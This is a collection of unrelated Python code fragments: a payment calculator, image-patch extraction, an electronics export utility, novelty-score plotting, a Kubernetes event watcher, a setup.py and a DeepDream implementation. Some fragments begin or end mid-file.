print >>sys.stderr, '\tB: active: %3d'%(n_activeB)
print >>sys.stderr, '\tB: inactive: %3d'%(n_inactiveB)
print >>sys.stderr, '\tB: inconclusive: %3d'%(n_inconclusiveB)
print >>sys.stderr, '\tB: unspecified: %3d'%(n_unspecifiedB)
print >>sys.stderr, '\tB: discrepant: %3d'%(n_discrepantB)
print >>sys.stderr, '\tB: total: %3d'%(len(sidsB.keys()))
print >>sys.stderr, '\t common active: %3d'%(n_active_common)
sim = float(n_active_common) / len(sids_common)
print >>sys.stderr, '\t Tanimoto similarity: %.3f'%(sim)
|
## Gerenciando Pagamentos
print('{:=^40}'.format(' Loja do Wollacy '))
valor=float(input('Qual valor da compra? '))
print('''FORMAS DE PAGAMENTO
[1] à vista dinheiro
[2] débito
[3] até 3x cartão
[4] mais de 3x no cartão
''')
opcao=int(input('Escolha a opção de pagamento: '))
if opcao==1:
valorFinal=valor-(valor*10/100)
print('Valor total= R$ {:.2f}'.format(valorFinal))
elif opcao==2:
valorFinal=valor-(valor*5/100)
print('Valor total= R$ {:.2f}'.format(valorFinal))
elif opcao==3:
valorFinal=valor
parcela=int(input('Digite o número de parcelas: '))
vlrParcela=valorFinal/parcela
print('Sua compra parcelada em {}x SEM juros. Valor de R$ {:.2f} por parcela. Valor total= R$ {:.2f}'.format(parcela, vlrParcela, valorFinal))
elif opcao==4:
valorFinal=valor+(valor*20/100)
parcela=int(input('Digite o número de parcelas: '))
vlrParcela=valorFinal/parcela
print('Sua compra parcelada em {}x COM juros de 20%. Valor de R$ {:.2f} por parcela. Valor total= R$ {:.2f}'.format(parcela, vlrParcela, valorFinal))
else:
print('Opção inválida!')
|
import numpy as np
import math
def extract_patches(kpts, img, PS=32, mag_factor = 10.0, input_format = 'cv2'):
"""
Extracts patches given the keypoints in the one of the following formats:
- cv2: list of cv2 keypoints
- cv2+A: tuple of (list of cv2 keypoints, Nx2x2 np array)
- ellipse: Nx5 np array, single row is [x y a b c]
- xyA: Nx6 np array, single row is [x y a11 a12 a21 a22]
- LAF: Nx2x3 np array, single row is [a11 a12 x; a21 a22 y]
Returns list of patches.
Upgraded version of
mag_factor is a scale coefficient. Use 10 for extracting OpenCV SIFT patches,
1.0 for OpenCV ORB patches, etc
PS is the output patch size in pixels
"""
if input_format == 'cv2':
Ms, pyr_idxs = convert_cv2_keypoints(kpts, PS, mag_factor)
elif input_format == 'cv2+A':
Ms, pyr_idxs = convert_cv2_plus_A_keypoints(kpts[0], kpts[1], PS, mag_factor)
elif (input_format == 'ellipse') or (input_format == 'xyabc'):
assert kpts.shape[1] == 5
Ms, pyr_idxs = convert_ellipse_keypoints(kpts, PS, mag_factor)
elif input_format == 'xyA':
assert kpts.shape[1] == 6
Ms, pyr_idxs = convert_xyA(kpts, PS, mag_factor)
elif input_format == 'LAF':
assert len(kpts.shape) == 3
assert len(kpts.shape[2]) == 3
assert len(kpts.shape[1]) == 2
Ms, pyr_idxs = convert_LAFs(kpts, PS, mag_factor)
else:
raise ValueError('Unknown input format',input_format)
return extract_patches_Ms(Ms, img, pyr_idxs, PS)
def build_image_pyramid(img, min_size):
"""
Builds image pyramid
"""
import cv2
import math
patches = []
img_pyr = [img]
cur_img = img
while np.min(cur_img.shape[:2]) > min_size:
cur_img = cv2.pyrDown(cur_img)
img_pyr.append(cur_img)
return img_pyr
def extract_patches_Ms(Ms, img, pyr_idxs = [], PS=32):
"""
Builds image pyramid and rectifies patches around keypoints
in the tranformation matrix format
from the appropriate level of image pyramid,
removing high freq artifacts. Border mode is set to "replicate",
so the boundary patches don`t have crazy black borders
Returns list of patches.
Upgraded version of
https://github.com/vbalnt/tfeat/blob/master/tfeat_utils.py
"""
assert len(Ms) == len(pyr_idxs)
import cv2
import math
img_pyr = build_image_pyramid(img, PS/2.0)
patches = []
for i, M in enumerate(Ms):
patch = cv2.warpAffine(img_pyr[pyr_idxs[i]], M, (PS, PS),
flags=cv2.WARP_INVERSE_MAP + \
cv2.INTER_LINEAR + cv2.WARP_FILL_OUTLIERS, borderMode=cv2.BORDER_REPLICATE)
patches.append(patch)
return patches
def convert_cv2_keypoints(kps, PS, mag_factor):
"""
Converts OpenCV keypoints into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x,y = kp.pt
s = kp.size
a = kp.angle
s = mag_factor * s / PS
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
s_pyr = s / d_factor
cos = math.cos(a * math.pi / 180.0)
sin = math.sin(a * math.pi / 180.0)
M = np.matrix([
[+s_pyr * cos, -s_pyr * sin, (-s_pyr * cos + s_pyr * sin) * PS / 2.0 + x/d_factor],
[+s_pyr * sin, +s_pyr * cos, (-s_pyr * sin - s_pyr * cos) * PS / 2.0 + y/d_factor]])
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def convert_cv2_plus_A_keypoints(kps, A, PS, mag_factor):
"""
Converts OpenCV keypoints + A [n x 2 x 2] affine shape
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x,y = kp.pt
s = kp.size
a = kp.angle
s = mag_factor * s / PS
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
s_pyr = s / d_factor
cos = math.cos(a * math.pi / 180.0)
sin = math.sin(a * math.pi / 180.0)
Ai = A[i]
RotA = np.matrix([
[+s_pyr * cos, -s_pyr * sin],
[+s_pyr * sin, +s_pyr * cos]])
Ai = np.matmul(RotA,np.matrix(Ai))
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def convert_xyA(kps, PS, mag_factor):
"""
Converts n x [x y a11 a12 a21 a22] affine regions
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x = kp[0]
y = kp[1]
Ai = mag_factor * kp[2:].reshape(2,2) / PS
s = np.sqrt(np.abs(Ai[0,0]*Ai[1,1]-Ai[0,1]*Ai[1,0]))
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
Ai = Ai / d_factor
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def convert_LAFs(kps, PS, mag_factor):
"""
Converts n x [ a11 a12 x; a21 a22 y] affine regions
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, kp in enumerate(kps):
x = kp[0,2]
y = kp[1,2]
Ai = mag_factor * kp[:2,:2] / PS
s = np.sqrt(np.abs(Ai[0,0]*Ai[1,1]-Ai[0,1]*Ai[1,0]))
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
Ai = Ai / d_factor
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
def Ell2LAF(ell):
"""
Converts ellipse [x y a b c] into [ a11 a12 x; a21 a22 y] affine region
"""
A23 = np.zeros((2,3))
A23[0,2] = ell[0]
A23[1,2] = ell[1]
a = ell[2]
b = ell[3]
c = ell[4]
sc = np.sqrt(np.sqrt(a*c - b*b))
ia,ib,ic = invSqrt(a,b,c) #because sqrtm returns ::-1, ::-1 matrix, don`t know why
A = np.array([[ia, ib], [ib, ic]]) / sc
sc = np.sqrt(A[0,0] * A[1,1] - A[1,0] * A[0,1])
A23[0:2,0:2] = rectifyAffineTransformationUpIsUp(A / sc) * sc
return A23
def invSqrt(a,b,c):
eps = 1e-12
mask = (b != 0)
r1 = mask * (c - a) / (2. * b + eps)
t1 = np.sign(r1) / (np.abs(r1) + np.sqrt(1. + r1*r1));
r = 1.0 / np.sqrt( 1. + t1*t1)
t = t1*r;
r = r * mask + 1.0 * (1.0 - mask);
t = t * mask;
x = 1. / np.sqrt( r*r*a - 2*r*t*b + t*t*c)
z = 1. / np.sqrt( t*t*a + 2*r*t*b + r*r*c)
d = np.sqrt( x * z)
x = x / d
z = z / d
new_a = r*r*x + t*t*z
new_b = -r*t*x + t*r*z
new_c = t*t*x + r*r *z
return new_a, new_b, new_c
def rectifyAffineTransformationUpIsUp(A):
"""
Sets [ a11 a12; a21 a22] into upright orientation
"""
det = np.sqrt(np.abs(A[0,0]*A[1,1] - A[1,0]*A[0,1] + 1e-10))
b2a2 = np.sqrt(A[0,1] * A[0,1] + A[0,0] * A[0,0])
A_new = np.zeros((2,2))
A_new[0,0] = b2a2 / det
A_new[0,1] = 0
A_new[1,0] = (A[1,1]*A[0,1]+A[1,0]*A[0,0])/(b2a2*det)
A_new[1,1] = det / b2a2
return A_new
def convert_ellipse_keypoints(ells, PS, mag_factor):
"""
Converts n x [ x y a b c] affine regions
into transformation matrix
and pyramid index to extract from for the patch extraction
"""
Ms = []
pyr_idxs = []
for i, ell in enumerate(ells):
LAF = Ell2LAF(ell)
x = LAF[0,2]
y = LAF[1,2]
Ai = mag_factor * LAF[:2,:2] / PS
s = np.sqrt(np.abs(Ai[0,0]*Ai[1,1]-Ai[0,1]*Ai[1,0]))
pyr_idx = int(math.log(s,2))
d_factor = float(math.pow(2.,pyr_idx))
Ai = Ai / d_factor
M = np.concatenate([Ai, [
[(-Ai[0,0] - Ai[0,1]) * PS / 2.0 + x/d_factor],
[(-Ai[1,0] - Ai[1,1]) * PS / 2.0 + y/d_factor]]], axis = 1)
Ms.append(M)
pyr_idxs.append(pyr_idx)
return Ms, pyr_idxs
|
#!/usr/bin/env python
# Copyright 2015-2016 Scott Bezek and the splitflap contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import subprocess
import sys
import tempfile
import time
from contextlib import contextmanager
electronics_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
repo_root = os.path.dirname(electronics_root)
sys.path.append(repo_root)
from thirdparty.xvfbwrapper.xvfbwrapper import Xvfb
from util import file_util, rev_info
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
class PopenContext(subprocess.Popen):
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self.stdout:
self.stdout.close()
if self.stderr:
self.stderr.close()
if self.stdin:
self.stdin.close()
if type:
self.terminate()
# Wait for the process to terminate, to avoid zombies.
self.wait()
def xdotool(command):
return subprocess.check_output(['xdotool'] + command)
def wait_for_window(name, window_regex, additional_commands=None, timeout=10):
if additional_commands is not None:
commands = additional_commands
else:
commands = []
DELAY = 0.5
logger.info('Waiting for %s window...', name)
for i in range(int(timeout/DELAY)):
try:
xdotool(['search', '--name', window_regex] + commands)
logger.info('Found %s window', name)
return
except subprocess.CalledProcessError:
pass
time.sleep(DELAY)
raise RuntimeError('Timed out waiting for %s window' % name)
@contextmanager
def recorded_xvfb(video_filename, **xvfb_args):
with Xvfb(**xvfb_args):
with PopenContext([
'recordmydesktop',
'--no-sound',
'--no-frame',
'--on-the-fly-encoding',
'-o', video_filename], close_fds=True) as screencast_proc:
yield
screencast_proc.terminate()
def get_versioned_contents(filename):
with open(filename, 'r') as f:
original_contents = f.read()
date = rev_info.current_date()
rev = rev_info.git_short_rev()
logger.info('Replacing placeholders with %s and %s' % (date, rev))
return original_contents, original_contents \
.replace('Date ""', 'Date "%s"' % date) \
.replace('DATE: YYYY-MM-DD', 'DATE: %s' % date) \
.replace('Rev ""', 'Rev "%s"' % rev) \
.replace('COMMIT: deadbeef', 'COMMIT: %s' % rev)
@contextmanager
def versioned_file(filename):
original_contents, versioned_contents = get_versioned_contents(filename)
with open(filename, 'w') as temp_schematic:
logger.debug('Writing to %s', filename)
temp_schematic.write(versioned_contents)
try:
yield
finally:
with open(filename, 'w') as temp_schematic:
logger.debug('Restoring %s', filename)
temp_schematic.write(original_contents)
@contextmanager
def patch_config(filename, replacements):
if not os.path.exists(filename):
yield
return
with open(filename, 'r') as f:
original_contents = f.read()
new_contents = original_contents
for (key, value) in replacements.items():
pattern = '^' + re.escape(key) + '=(.*)$'
new_contents = re.sub(pattern, key + '=' + value, new_contents, flags=re.MULTILINE)
with open(filename, 'w') as f:
logger.debug('Writing to %s', filename)
f.write(new_contents)
try:
yield
finally:
with open(filename, 'w') as f:
logger.debug('Restoring %s', filename)
f.write(original_contents)
|
from typing import Union, Optional
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from statannot import add_stat_annotation
plt.style.use("default")
plt.rcParams.update(plt.rcParamsDefault)
def plot_scores_boxplot(scores_test: Union[dict, pd.DataFrame],
scores_new: Union[dict, pd.DataFrame],
show_outliers: bool = True,
stat_test: str = "Mann-Whitney-ls",
return_results: bool = True,
title: str = "",
figsize=(15, 8),
save_dir: Optional[str] = None,
):
"""
Plots scores of two datasets as a boxplot with statistical annotation.
Parameters
----------
scores_test: Union[dict, pd.DataFrame]
Test scores (baseline) obtained by each model.
scores_new: Union[dict, pd.DataFrame]
New scores to be compared with the test scores.
show_outliers: bool
Indicates whether outliers are shown in the plot.
stat_test: str
Specify which statistical test should be used for comparison. Must be one of: [`Levene`, `Mann-Whitney`,
`Mann-Whitney-gt`, `Mann-Whitney-ls`, `t-test_ind`, `t-test_welch`, `t-test_paired`, `Wilcoxon`, `Kruskal`]
return_results: bool
If true, returns a dictionary of StatResult objects for each model.
title : str
Title to appear on the plot
figsize
Returns
-------
test_results: Optional(dict[StatResult])
Dictionary of StatResult objects for each model that contain a desired statistic and a p-value.
"""
plt.style.use("default")
assert set(scores_test.keys()) == set(scores_new.keys())
fig = plt.figure(figsize=figsize)
columns = scores_test.keys()
df_test, df_new = pd.DataFrame(scores_test), pd.DataFrame(scores_new)
df_test["type"] = ["Test"] * df_test.shape[0]
df_new["type"] = ["OOD"] * df_new.shape[0]
df_scores = pd.concat([df_test, df_new])
if return_results:
test_results = {}
for i, key in enumerate(columns):
ax = fig.add_subplot(3, 6, i + 1)
sns.boxplot(data=df_scores,
x="type",
y=key,
ax=ax,
showfliers=show_outliers)
ax.set_xticklabels(["Test Data", "OOD Data"])
ax.set_title(key)
stats = add_stat_annotation(ax,
data=df_scores,
x="type",
y=key,
box_pairs=[("Test", "OOD")],
test=stat_test,
loc='outside',
verbose=0,
line_offset_to_box=0.2)
ax.set_xlabel("")
ax.set_ylabel("Novelty Scores")
if return_results:
test_results[key] = stats
plt.suptitle(title, y=1.005, x=0.45)
fig.tight_layout(pad=1.0)
if save_dir is not None:
plt.savefig(save_dir, dpi=300, bbox_inches="tight")
plt.close()
else:
plt.show()
if return_results:
return test_results
def plot_scores_distr(scores_test: Union[dict, pd.DataFrame],
scores_new: Union[dict, pd.DataFrame],
clip_q: float = 0,
save_dir: Optional[str] = None,
figsize=(15, 6),
title="",
labels=None,
**kwargs,
):
"""
Parameters
----------
save_dir
scores_test: Union[dict, pd.DataFrame]
Test scores (baseline) obtained by each model.
scores_new: Union[dict, pd.DataFrame]
New scores to be compared with the test scores.
clip_q: float
Float that specifies the inter-quantile region to be plotted. If zero, all values are plotted.
It is used to remove outlier points from the plot to better see details of the distrbutions.
Example: clip_q = 0.05 results in plotting the interval of 0.05% scores - 0.95 % new scores.
figsize
**kwargs
Arguments passed to the pandas.DataFrame.plot() function
"""
plt.style.use("default")
assert 0 <= clip_q < 0.5
assert set(scores_test.keys()) == set(scores_new.keys())
fig = plt.figure(figsize=figsize)
for i, key in enumerate(scores_test.keys()):
scores_test_ax = pd.Series(scores_test[key])
scores_new_ax = pd.Series(scores_new[key])
ax = fig.add_subplot(3, 6, i + 1)
clip_min = min(min(scores_test_ax), min(scores_new_ax))
clip_max = max(scores_test_ax.quantile(1 - clip_q), scores_new_ax.quantile(1 - clip_q))
np.clip(scores_test_ax, clip_min, clip_max).plot(ax=ax,
label="Test",
alpha=0.9,
density=True,
**kwargs)
np.clip(scores_new_ax, clip_min, clip_max).plot(ax=ax,
label="OOD",
density=True,
alpha=0.6,
**kwargs)
label = "Novelty Score"
if labels is not None:
try:
label = labels[key]
except ValueError:
pass
ax.set_xlabel(label)
ax.legend()
ax.set_title(key)
fig.tight_layout(pad=1.0)
plt.suptitle(title, y=1.01)
if save_dir is not None:
plt.savefig(save_dir, dpi=300, bbox_inches="tight")
plt.close()
else:
plt.show()
def plot_heatmap(df: pd.DataFrame,
title: str = "",
figsize: tuple = (10, 3),
save_dir: Optional[str] = None,
annot: [bool, np.ndarray] = True,
vmin: float = 0.5,
vmax: float = 1.0,
cmap: str = "OrRd",
**kwargs):
"""
Plots provided dataframe as sns.heatmap.
Parameters
----------
df: pd.DataFrame
Dataframe to be plotted.
title: str
Title to display on the top of the plot.
figsize: tuple
Indicates size of the image.
save_dir: Optional(str)
If provided, the plot will be saved in this directory.
annot: bool, np.ndarray
If annot is set to True, adds a simple annotation of the value to the plotted heatmap. Alternatively,
a custom annotation in an array can be provided where array shape corresponds to the dataframe shape.
vmin, vmax : float
Minimal and maximal value to use in the colorbar.
cmap: str
Color map to be used.
kwargs:
Other arguments to be passed to sns.heatmap
Returns
-------
"""
plt.style.use("default")
_, ax = plt.subplots(figsize=figsize)
sns.set(font_scale=0.9)
sns.heatmap(
df.T,
vmin=vmin,
vmax=vmax,
ax=ax,
cmap=cmap,
annot=annot,
**kwargs
)
plt.setp(ax.get_yticklabels(), rotation=0, ha="right", rotation_mode="anchor")
plt.xticks()
plt.yticks()
plt.title(title)
if save_dir is not None:
plt.savefig(save_dir, dpi=300, bbox_inches="tight")
plt.close()
else:
plt.show()
|
import queue
import logging
import argparse
import kubernetes.client
from utils.kubernetes.config import configure
from utils.signal import install_shutdown_signal_handlers
from utils.kubernetes.watch import KubeWatcher, WatchEventType
from utils.threading import SupervisedThread, SupervisedThreadGroup
from .config import load_config
from .format import format_event
log = logging.getLogger(__name__)
def main():
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--master', help='kubernetes api server url')
arg_parser.add_argument('--in-cluster', action='store_true', help='configure with in-cluster config')
arg_parser.add_argument('--log-level', default='WARNING')
arg_parser.add_argument('--config', required=True)
args = arg_parser.parse_args()
logging.basicConfig(format='%(levelname)s: %(message)s', level=args.log_level)
configure(args.master, args.in_cluster)
install_shutdown_signal_handlers()
config = load_config(args.config)
q = queue.Queue()
threads = SupervisedThreadGroup()
threads.add_thread(WatcherThread(q))
threads.add_thread(HandlerThread(q, config))
threads.start_all()
threads.wait_any()
class HandlerThread(SupervisedThread):
def __init__(self, queue, config):
super().__init__()
self.queue = queue
self.config = config
def run_supervised(self):
while True:
event = self.queue.get()
self.handle(event)
def handle(self, event):
for mapping in self.config.mappings:
if mapping.does_match(event):
try:
mapping.sink(event)
except Exception:
log.exception('Failed to handle event')
class WatcherThread(SupervisedThread):
def __init__(self, queue):
super().__init__(daemon=True)
self.queue = queue
def run_supervised(self):
v1 = kubernetes.client.CoreV1Api()
watcher = iter(KubeWatcher(v1.list_event_for_all_namespaces))
for event_type, event in watcher:
if event_type == WatchEventType.DONE_INITIAL:
break
for event_type, event in watcher:
if event_type != WatchEventType.ADDED:
continue
event._formatted = format_event(event)
self.queue.put(event)
if __name__ == '__main__':
main()
|
from setuptools import setup
setup(
name='equibel',
version='0.9.5', # v0.9.5
description='A toolkit for equivalence-based belief change',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
],
keywords=['AI', 'belief change', 'belief revision', 'belief merging', 'multi-agent network'],
url='https://github.com/asteroidhouse/equibel',
author='Paul Vicol',
author_email='pvicol@sfu.ca',
license='MIT',
packages=[
'equibel',
],
include_package_data = True,
install_requires=[
'networkx',
'ply',
'sympy',
],
)
|
""""
this package contains the main and support classes for the layout widgets
"""
|
"""
This file contains the implementation of the DeepDream algorithm.
If you have problems understanding any parts of the code,
go ahead and experiment with functions in the playground.py file.
"""
import os
import argparse
import shutil
import time
import numpy as np
import torch
import cv2 as cv
import utils.utils as utils
from utils.constants import *
import utils.video_utils as video_utils
from collections import namedtuple
# loss.backward(layer) <- original implementation did it like this it's equivalent to MSE(reduction='sum')/2
def gradient_ascent(config, model, input_tensor, layer_ids_to_use, iteration):
# Step 0: Feed forward pass
out = model(input_tensor)
# Step 1: Grab activations/feature maps of interest
activations = [out[layer_id_to_use] for layer_id_to_use in layer_ids_to_use]
# Step 2: Calculate loss over activations
losses = []
for layer_activation in activations:
# Use torch.norm(torch.flatten(layer_activation), p) with p=2 for L2 loss and p=1 for L1 loss.
# But I'll use the MSE as it works really good, I didn't notice any serious change when going to L1/L2.
# using torch.zeros_like as if we wanted to make activations as small as possible but we'll do gradient ascent
# and that will cause it to actually amplify whatever the network "sees" thus yielding the famous DeepDream look
loss_component = torch.nn.MSELoss(reduction='mean')(layer_activation, torch.zeros_like(layer_activation))
losses.append(loss_component)
loss = torch.mean(torch.stack(losses))
loss.backward()
# Step 3: Process image gradients (smoothing + normalization)
grad = input_tensor.grad.data
# Applies 3 Gaussian kernels and thus "blurs" or smoothens the gradients and gives visually more pleasing results
# sigma is calculated using an arbitrary heuristic feel free to experiment
sigma = ((iteration + 1) / config['num_gradient_ascent_iterations']) * 2.0 + config['smoothing_coefficient']
smooth_grad = utils.CascadeGaussianSmoothing(kernel_size=9, sigma=sigma)(grad) # "magic number" 9 just works well
# Normalize the gradients (make them have mean = 0 and std = 1)
# I didn't notice any big difference normalizing the mean as well - feel free to experiment
g_std = torch.std(smooth_grad)
g_mean = torch.mean(smooth_grad)
smooth_grad = smooth_grad - g_mean
smooth_grad = smooth_grad / g_std
# Step 4: Update image using the calculated gradients (gradient ascent step)
input_tensor.data += config['lr'] * smooth_grad
# Step 5: Clear gradients and clamp the data (otherwise values would explode to +- "infinity")
input_tensor.grad.data.zero_()
input_tensor.data = torch.max(torch.min(input_tensor, UPPER_IMAGE_BOUND), LOWER_IMAGE_BOUND)
def deep_dream_static_image(config, img):
model = utils.fetch_and_prepare_model(config['model_name'], config['pretrained_weights'], DEVICE)
try:
layer_ids_to_use = [model.layer_names.index(layer_name) for layer_name in config['layers_to_use']]
except Exception as e: # making sure you set the correct layer name for this specific model
print(f'Invalid layer names {[layer_name for layer_name in config["layers_to_use"]]}.')
print(f'Available layers for model {config["model_name"]} are {model.layer_names}.')
return
if img is None: # load either the provided image or start from a pure noise image
img_path = utils.parse_input_file(config['input'])
# load a numpy, [0, 1] range, channel-last, RGB image
img = utils.load_image(img_path, target_shape=config['img_width'])
if config['use_noise']:
shape = img.shape
img = np.random.uniform(low=0.0, high=1.0, size=shape).astype(np.float32)
img = utils.pre_process_numpy_img(img)
base_shape = img.shape[:-1] # save initial height and width
# Note: simply rescaling the whole result (and not only details, see original implementation) gave me better results
# Going from smaller to bigger resolution (from pyramid top to bottom)
for pyramid_level in range(config['pyramid_size']):
new_shape = utils.get_new_shape(config, base_shape, pyramid_level)
img = cv.resize(img, (new_shape[1], new_shape[0]))
input_tensor = utils.pytorch_input_adapter(img, DEVICE)
for iteration in range(config['num_gradient_ascent_iterations']):
h_shift, w_shift = np.random.randint(-config['spatial_shift_size'], config['spatial_shift_size'] + 1, 2)
input_tensor = utils.random_circular_spatial_shift(input_tensor, h_shift, w_shift)
gradient_ascent(config, model, input_tensor, layer_ids_to_use, iteration)
input_tensor = utils.random_circular_spatial_shift(input_tensor, h_shift, w_shift, should_undo=True)
img = utils.pytorch_output_adapter(input_tensor)
return utils.post_process_numpy_img(img)
def deep_dream_video_ouroboros(config):
"""
Feeds the output dreamed image back to the input and repeat
Name etymology for nerds: https://en.wikipedia.org/wiki/Ouroboros
"""
ts = time.time()
assert any([config['input_name'].lower().endswith(img_ext) for img_ext in SUPPORTED_IMAGE_FORMATS]), \
f'Expected an image, but got {config["input_name"]}. Supported image formats {SUPPORTED_IMAGE_FORMATS}.'
utils.print_ouroboros_video_header(config) # print some ouroboros-related metadata to the console
img_path = utils.parse_input_file(config['input'])
# load numpy, [0, 1] range, channel-last, RGB image
# use_noise and consequently None value, will cause it to initialize the frame with uniform, [0, 1] range, noise
frame = None if config['use_noise'] else utils.load_image(img_path, target_shape=config['img_width'])
for frame_id in range(config['ouroboros_length']):
print(f'Ouroboros iteration {frame_id+1}.')
# Step 1: apply DeepDream and feed the last iteration's output to the input
frame = deep_dream_static_image(config, frame)
dump_path = utils.save_and_maybe_display_image(config, frame, name_modifier=frame_id)
print(f'Saved ouroboros frame to: {os.path.relpath(dump_path)}\n')
# Step 2: transform frame e.g. central zoom, spiral, etc.
# Note: this part makes amplifies the psychodelic-like appearance
frame = utils.transform_frame(config, frame)
video_utils.create_video_from_intermediate_results(config)
print(f'time elapsed = {time.time()-ts} seconds.')
class ResNet50(torch.nn.Module):
def __init__(self, pretrained_weights, requires_grad=False, show_progress=False):
super().__init__()
if pretrained_weights == SupportedPretrainedWeights.IMAGENET.name:
resnet50 = models.resnet50(pretrained=True, progress=show_progress).eval()
elif pretrained_weights == SupportedPretrainedWeights.PLACES_365.name:
resnet50 = models.resnet50(pretrained=False, progress=show_progress).eval()
binary_name = 'resnet50_places365.pth.tar'
resnet50_places365_binary_path = os.path.join(BINARIES_PATH, binary_name)
if os.path.exists(resnet50_places365_binary_path):
state_dict = torch.load(resnet50_places365_binary_path)['state_dict']
else:
binary_url = r'http://places2.csail.mit.edu/models_places365/resnet50_places365.pth.tar'
print(f'Downloading {binary_name} from {binary_url} it may take some time.')
download_url_to_file(binary_url, resnet50_places365_binary_path)
print('Done downloading.')
state_dict = torch.load(resnet50_places365_binary_path)['state_dict']
new_state_dict = {} # modify key names and make it compatible with current PyTorch model naming scheme
for old_key in state_dict.keys():
new_key = old_key[7:]
new_state_dict[new_key] = state_dict[old_key]
resnet50.fc = torch.nn.Linear(resnet50.fc.in_features, 365)
resnet50.load_state_dict(new_state_dict, strict=True)
else:
raise Exception(f'Pretrained weights {pretrained_weights} not yet supported for {self.__class__.__name__} model.')
self.layer_names = ['layer1', 'layer2', 'layer3', 'layer4']
self.conv1 = resnet50.conv1
self.bn1 = resnet50.bn1
self.relu = resnet50.relu
self.maxpool = resnet50.maxpool
# 3
self.layer10 = resnet50.layer1[0]
self.layer11 = resnet50.layer1[1]
self.layer12 = resnet50.layer1[2]
# 4
self.layer20 = resnet50.layer2[0]
self.layer21 = resnet50.layer2[1]
self.layer22 = resnet50.layer2[2]
self.layer23 = resnet50.layer2[3]
# 6
self.layer30 = resnet50.layer3[0]
self.layer31 = resnet50.layer3[1]
self.layer32 = resnet50.layer3[2]
self.layer33 = resnet50.layer3[3]
self.layer34 = resnet50.layer3[4]
self.layer35 = resnet50.layer3[5]
# 3
self.layer40 = resnet50.layer4[0]
self.layer41 = resnet50.layer4[1]
# self.layer42 = resnet50.layer4[2]
# Go even deeper into ResNet's BottleNeck module for layer 42
self.layer42_conv1 = resnet50.layer4[2].conv1
self.layer42_bn1 = resnet50.layer4[2].bn1
self.layer42_conv2 = resnet50.layer4[2].conv2
self.layer42_bn2 = resnet50.layer4[2].bn2
self.layer42_conv3 = resnet50.layer4[2].conv3
self.layer42_bn3 = resnet50.layer4[2].bn3
self.layer42_relu = resnet50.layer4[2].relu
# Set these to False so that PyTorch won't be including them in its autograd engine - eating up precious memory
if not requires_grad:
for param in self.parameters():
param.requires_grad = False
# Feel free to experiment with different layers
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer10(x)
layer10 = x
x = self.layer11(x)
layer11 = x
x = self.layer12(x)
layer12 = x
x = self.layer20(x)
layer20 = x
x = self.layer21(x)
layer21 = x
x = self.layer22(x)
layer22 = x
x = self.layer23(x)
layer23 = x
x = self.layer30(x)
layer30 = x
x = self.layer31(x)
layer31 = x
x = self.layer32(x)
layer32 = x
x = self.layer33(x)
layer33 = x
x = self.layer34(x)
layer34 = x
x = self.layer35(x)
layer35 = x
x = self.layer40(x)
layer40 = x
x = self.layer41(x)
layer41 = x
layer42_identity = layer41
x = self.layer42_conv1(x)
layer420 = x
x = self.layer42_bn1(x)
layer421 = x
x = self.layer42_relu(x)
layer422 = x
x = self.layer42_conv2(x)
layer423 = x
x = self.layer42_bn2(x)
layer424 = x
x = self.layer42_relu(x)
layer425 = x
x = self.layer42_conv3(x)
layer426 = x
x = self.layer42_bn3(x)
layer427 = x
x += layer42_identity
layer428 = x
x = self.relu(x)
layer429 = x
# Feel free to experiment with different layers, layer35 is my favourite
net_outputs = namedtuple("ResNet50Outputs", self.layer_names)
# You can see the potential ambiguity arising here if we later want to reconstruct images purely from the filename
out = net_outputs(layer10, layer23, layer34, layer40)
return out
def deep_dream_video(config):
video_path = utils.parse_input_file(config['input'])
tmp_input_dir = os.path.join(OUT_VIDEOS_PATH, 'tmp_input')
tmp_output_dir = os.path.join(OUT_VIDEOS_PATH, 'tmp_out')
config['dump_dir'] = tmp_output_dir
